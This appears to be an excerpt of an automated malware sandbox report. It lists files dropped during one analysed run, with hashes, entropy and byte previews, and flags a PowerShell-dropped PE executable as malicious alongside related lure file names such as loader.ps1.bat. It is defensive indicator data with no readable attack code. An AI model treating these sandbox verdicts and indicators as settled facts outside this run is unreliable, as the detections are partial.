                                                                                                                                                      Entropy (8bit):6.048570105339913
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:2tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhiq27Ai2NpEV9SLTW:6MkbJrT8IeQc5d1f27Ai2NpSSLa
                                                                                                                                                      MD5:245959095135DB3CAA5EE7807A79E3FB
                                                                                                                                                      SHA1:98B049784406AC79AD96C6BE8FB6477CBDD109AB
                                                                                                                                                      SHA-256:E16DEEF89F2A31BDBD9159B3BAE76D54B044F81F29F9AF0724421382D6C0EDD8
                                                                                                                                                      SHA-512:C22C0B3CF679E187FDAFC1D143F6CAFD7BE8E1BCD475403CCAB31A770A1AF99514ABE0C0B0080474649B296BD93DBD381D0A530DBFC4B808BE57523BB0ECBE8F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377790692304850","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733317097"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):24028
                                                                                                                                                      Entropy (8bit):6.048530503769598
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:2tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhiq2Zii2NpEV9SLTW:6MkbJrT8IeQc5d1f2Zii2NpSSLa
                                                                                                                                                      MD5:9D67BF67C1876AA2A9529C99804D445A
                                                                                                                                                      SHA1:E3E80FEE7B1F6601592F9A674AEA671B79E257C0
                                                                                                                                                      SHA-256:E759624F1C2A14F6456FA03606B78C4FE53F93C76652394F720697ACD4EC5B66
                                                                                                                                                      SHA-512:88A7EBEBA5CE99C5497D01130DB247A10D4947456A3B7B64703B779EB2327CE019E3F4A320691F00BA609E9CC158492790D04286606AD4ADF133FE528E4323FD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377790692304850","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733317097"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2278
                                                                                                                                                      Entropy (8bit):3.8489450212540146
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:uiTrlKxrgx8Xxl9Il8ulDEMpLz23gWDSRURizd1rc:mzYfpLa5OJU
                                                                                                                                                      MD5:5756FC5B6FEF4C43ADA555D951B4EA09
                                                                                                                                                      SHA1:2A19033EC0C607F40C04403CA2F5B8120BA31AD5
                                                                                                                                                      SHA-256:4A6DA8F4FC77C7F4F00076CDA21CEB74CD7C6E2974A6A57B5F766499436728CA
                                                                                                                                                      SHA-512:9CE1F403713B0DCF52719B52E7F256DD9CC0B58464CA233F4C646CC2B41BB5D6D0D88860E05BED01A8528E5EDC92201B41613805DBCE01D540A44BC4C2CD6E1C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.G.K.C.k.V.R.G.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.h.x.F.i.I.5.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4622
                                                                                                                                                      Entropy (8bit):4.005141950269076
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:QlYimPJMiw3bxV2X9NpaxfvnxXO00LcjPLDm0:Ql2PJMTVAcfvnxe0Zju0
                                                                                                                                                      MD5:E9F5642CD072E752745CA391868C5AE7
                                                                                                                                                      SHA1:784D56FF78866967E802252A404A042AB896B6D8
                                                                                                                                                      SHA-256:0668C7A3D7A3EDC6419192EED633E9BE3B6CFD7D1B6B821F8CA8268A6138FA2F
                                                                                                                                                      SHA-512:22DB4ABBB1135216BD87267F2181A396B0D39A68128F742CBFAB17CC61C83FFA4513D8FAF89F7AE396D2709C36DC2D5D15856ED7EDD1A200E47EB6A62F308499
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".o.T.w.O.d.0.x.G.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.h.x.F.i.I.5.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2684
                                                                                                                                                      Entropy (8bit):3.9146569689401023
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:uiTrlKx68Wa7xXFxl9Il8ulDEmR+H+cdo6CSlI9145lp7Idd/vc:aNhYV+H+D6BWg7Fx
                                                                                                                                                      MD5:3AE45FF5470A2A189EABDEC6CFAB429F
                                                                                                                                                      SHA1:E7FFE055B77B81DAAC3EB86EA8343B6FA8E2665F
                                                                                                                                                      SHA-256:F90628F5D19DD1D10BDCE0AE0648D2B94D187D3D043F0E7320D308C560894939
                                                                                                                                                      SHA-512:CB04E91348FD3D05BB4C54C41CEC751CD4AF23856D1349CC418323B35D62E42678B7220E08716243E1B14097447EA8501C729AAC96D7CF8B2EB5DA30E8A52247
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".o.D.P.P.p.x.1.l.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.h.x.F.i.I.5.
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):61147
                                                                                                                                                      Entropy (8bit):5.077943793919534
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
                                                                                                                                                      MD5:95B7548D8D8DDBAB0877BFC7F500503D
                                                                                                                                                      SHA1:894B9735A30AE067FF88622B4F9C8EDF36997F6F
                                                                                                                                                      SHA-256:D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
                                                                                                                                                      SHA-512:B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):64
                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:@...e...........................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):138356
                                                                                                                                                      Entropy (8bit):7.809609231921042
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                      MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                      SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                      SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                      SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2764800
                                                                                                                                                      Entropy (8bit):7.070336860381345
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:/VHFXSzmqiDqCbm1gickVsPT1uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuTuuuuC:/VHFXSzmqsegfkVsBuuuuuuuuuuuuuu5
                                                                                                                                                      MD5:1C0B92098975DC116DE9C0595D347882
                                                                                                                                                      SHA1:BD22E2B44DB0CFFD0AEADBD023318A7ED9E4D8BC
                                                                                                                                                      SHA-256:D0F631F6269C14FE7622F4A1085F99E6BFD235942CE57715914EE4A319484A55
                                                                                                                                                      SHA-512:699897751BA6D3FDAD4C808FF05E7C886328DADA9903A737AEF51155F0D074FE373FF85F63AFA5D55639DE4BB6AD30E8041C27F8F7FAE05A19192956C9C0F45B
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: 098aPtSbmd.bat, Detection: malicious, Browse
                                                                                                                                                      • Filename: loader.ps1.bat, Detection: malicious, Browse
                                                                                                                                                      • Filename: Documenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnk, Detection: malicious, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................z..............z........#.............................Rich..................PE..L......C.....................`....................@...........................6.....Y.$..............................................."..............................................................................................................text............................... ..`.rdata...|..........................@..@.data....)...P.......P..............@....rsrc........."......0..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):206855
                                                                                                                                                      Entropy (8bit):7.983991878155761
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:5WcDW3D2an0GMbYGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEJ:l81LZl7E6lEMVo/S01fDpWmEgs
                                                                                                                                                      MD5:073B6033A50D66A430E28DA712B07D76
                                                                                                                                                      SHA1:84EC9AE47D4E80E5DD8E45BFAE344A23547A957D
                                                                                                                                                      SHA-256:1CC5E40057D60CCF8C38887E0727B951355D1EE84E72CAD758835017658F5DDD
                                                                                                                                                      SHA-512:0491F27DAD2E2BA9260DADC88283AA9D97D46EC88F576A0C3A5A5E6EFE43C6B015CF64FC9C8FE46C73F2F276BEBF9E224B95AB6BF5ECF7DB42CB96B51572781F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):11185
                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41902
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):76319
                                                                                                                                                      Entropy (8bit):7.996132588300074
                                                                                                                                                      Encrypted:true
                                                                                                                                                      SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6w6DLZ8:GdS8scZNzFrMa4M+lK5/nEDd8
                                                                                                                                                      MD5:24439F0E82F6A60E541FB2697F02043F
                                                                                                                                                      SHA1:E3FAA84B0ED8CDD2268D53A0ECC6F3134D5EBD8F
                                                                                                                                                      SHA-256:B24DD5C374F8BB381A48605D183B6590245EE802C65F643632A3BE9BB1F313C5
                                                                                                                                                      SHA-512:8FD794657A9F80FDBC2350DC26A2C82DFD82266B934A4472B3319FDB870841C832137D4F5CE41D518859B8B1DA63031C6B7E750D301F87D6ECA45B958B147FCD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
